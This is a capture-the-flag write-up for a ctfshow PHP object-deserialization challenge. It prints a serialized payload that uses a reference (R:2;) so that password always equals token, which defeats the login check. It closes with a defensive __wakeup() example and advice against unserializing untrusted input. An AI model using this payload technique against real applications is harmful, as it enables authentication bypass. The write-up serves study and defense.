1. Code audit

    ```php
    <?php
    error_reporting(0);
    include('flag.php');
    highlight_file(__FILE__);

    class ctfshowAdmin{
        public $token;
        public $password;

        public function __construct($t,$p){
            $this->token=$t;
            $this->password = $p;
        }

        // Member method: login() checks whether token and password are strictly identical and returns the result
        public function login(){
            return $this->token===$this->password;
        }
    }

    // Receive the value and unserialize it
    $ctfshow = unserialize($_GET['ctfshow']);
    // Here the object's token property is overwritten with the md5 of a random number
    $ctfshow->token=md5(mt_rand());

    if($ctfshow->login()) // call the member method; when it returns true, output the flag
    {
        echo $flag;
    }
    ```

    
2. The `token` value here is not controllable, so the only way in is through `password`. Build the object with `&`: once `$password = &$token`, `password` is equal to `token` whatever `token` is later set to, because the serialized form stores `password` as a reference (`R:2;`) to the `token` slot and that reference survives `unserialize()`.

    ```php
    <?php
    class ctfshowAdmin{
        public $token;
        public $password;

        public function __construct($t,$p){
            $this->token=$t;
            // bind password to token by reference; serialize() emits this as R:2;
            $this->password = &$this->token;
        }
        public function login(){
            return $this->token===$this->password;
        }
    }
    $a =new ctfshowAdmin('123','123');
    $old=serialize($a);
    echo $old;

    //O:12:"ctfshowAdmin":2:{s:5:"token";s:3:"123";s:8:"password";R:2;}
    ```
    
3. Use the tool and pass the parameter via the URL.

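As an added example (not from the original writeup), the script below loads the `R:2;` payload shown above and demonstrates how a `__wakeup()` that re-materializes each property severs the reference that `unserialize()` restores, so the server-side overwrite of `token` no longer propagates into `password`. The class name and properties are the challenge's own; the `__wakeup()` body is an assumption added here for illustration.

```php
<?php
// Added example: reproduces the reference binding from the writeup and shows
// one way to sever it on the defending side. The __wakeup() body is not part
// of the original challenge code.
class ctfshowAdmin {
    public $token;
    public $password;

    public function __construct($t, $p) {
        $this->token = $t;
        $this->password = $p;
    }

    // unserialize() restores property references (R:/r: entries) before
    // calling __wakeup(). Copy each value, drop the property slot that
    // shares the reference, then reassign a fresh, independent value.
    public function __wakeup() {
        foreach (['token', 'password'] as $prop) {
            $copy = $this->$prop;
            unset($this->$prop);
            $this->$prop = $copy;
        }
    }

    public function login() {
        return $this->token === $this->password;
    }
}

// Payload from the writeup: password is stored as R:2;, a reference to token.
$payload = 'O:12:"ctfshowAdmin":2:{s:5:"token";s:3:"123";s:8:"password";R:2;}';

$ctfshow = unserialize($payload);
// Same server-side overwrite as in the challenge. Without __wakeup() the
// assignment would be mirrored into password and login() would succeed;
// with the references severed, password keeps its own value and login() fails.
$ctfshow->token = md5(mt_rand());
var_dump($ctfshow->login());
```

Severing references in `__wakeup()` only closes this particular trick; the underlying fix is to not pass attacker-controlled data to `unserialize()` at all (for example by exchanging JSON instead).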